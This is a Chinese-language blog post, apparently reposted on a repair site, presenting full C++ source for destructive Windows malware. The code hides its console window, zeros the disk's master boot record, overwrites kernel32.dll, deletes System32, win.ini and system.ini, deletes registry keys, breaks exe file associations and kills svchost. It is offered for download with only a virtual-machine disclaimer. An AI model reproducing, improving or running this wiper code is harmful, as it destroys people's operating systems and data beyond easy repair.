C++破坏电脑病毒 |
您所在的位置:网站首页 › 破坏电脑硬件的病毒怎么清除 › C++破坏电脑病毒 |
写了这么多python病毒,今天我来给大家分享一个C++病毒。
创作背景:我有个同学对电脑十分精通,而且对MBR十分感兴趣,他跟我分享了他怎么把MBR搞报废的历程。听完之后,我开始研究MBR。用python研究了2个月,结果做的是无用功。知道我这个月学了C++!我学会了如何破坏MBR!于是我开始做这款超强病毒。做了2天(一直在调试,把病毒弄到最佳状态)。 IDE:visual studio 2022 功能:感染kernel32.dll、删除system32、win.ini、system.ini、删除所有注册表、修改exe打开方式、修改MBR 修复方法:用PE修复引导,恢复丢失的文件,修复文件打开方式(或重装系统) 第一步,把头文件给导入进来。 #include #include #include然后做点设置 #define _CRT_SECURE_NO_WARNINGS 1 //跳过安全检查 #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )//隐藏dos窗口然后做修改MBR函数 void kill_mbr()//修改MBR { FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+"); char mbr[512] = { 0 }; fwrite(mbr, sizeof(mbr), 1, disk); fclose(disk); }做感染kernel32.dll函数 void infect()//感染kernel32.dll { FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+"); char write[666] = { 0 }; fwrite(write, sizeof(write), 1, infect_file); fclose(infect_file); }然后是其他功能的代码 system("del /f /s /q C:\\Windows\\System32\\*.*");//删除system32 system("ftype exefile='C:\\Windows\\notepad.exe'%*"); //把可执行文件的打开方式都改成notepad system("@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*");//删除所有注册表 system("attrib -s -r -h C:\\Windows\\system.ini"); system("del /f /s /q C:\\Windows\\system.ini"); system("attrib -s -r -h C:\\Windows\\win.ini"); system("del /f /s /q C:\\Windows\\win.ini"); //删除系统重要文件对了,还要终止系统进程 system("taskkill /f /im svchost.exe");然后这样的话运行之后直接蓝屏死机,连修复时间都基本没有~ 总代码 #define _CRT_SECURE_NO_WARNINGS 1 //跳过安全检查 #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )//隐藏dos窗口 #include #include #include using namespace std; void kill_mbr()//修改MBR { FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+"); char mbr[512] = { 0 }; fwrite(mbr, sizeof(mbr), 1, disk); fclose(disk); } void infect()//感染kernel32.dll { FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+"); char write[666] = { 0 }; fwrite(write, sizeof(write), 1, infect_file); fclose(infect_file); } int main() { infect(); kill_mbr(); system("del /f /s /q C:\\Windows\\System32\\*.*");//删除system32 system("ftype exefile='C:\\Windows\\notepad.exe'%*"); //把可执行文件的打开方式都改成notepad system("@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*");//删除所有注册表 system("attrib -s -r -h C:\\Windows\\system.ini"); system("del /f /s /q C:\\Windows\\system.ini"); system("attrib -s -r -h C:\\Windows\\win.ini"); system("del /f /s /q C:\\Windows\\win.ini"); //删除系统重要文件 system("taskkill /f /im svchost.exe"); return 0; }火绒报毒这是木马(好几次了) 我都生成不了程序了都...... 以上就是病毒代码,如要使用,请用虚拟机。下载研究后请严禁用于非法用途,使用本文件产生的一切后果由下载者自行承担,谢谢! 请多多提建议,我会继续改进的! |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |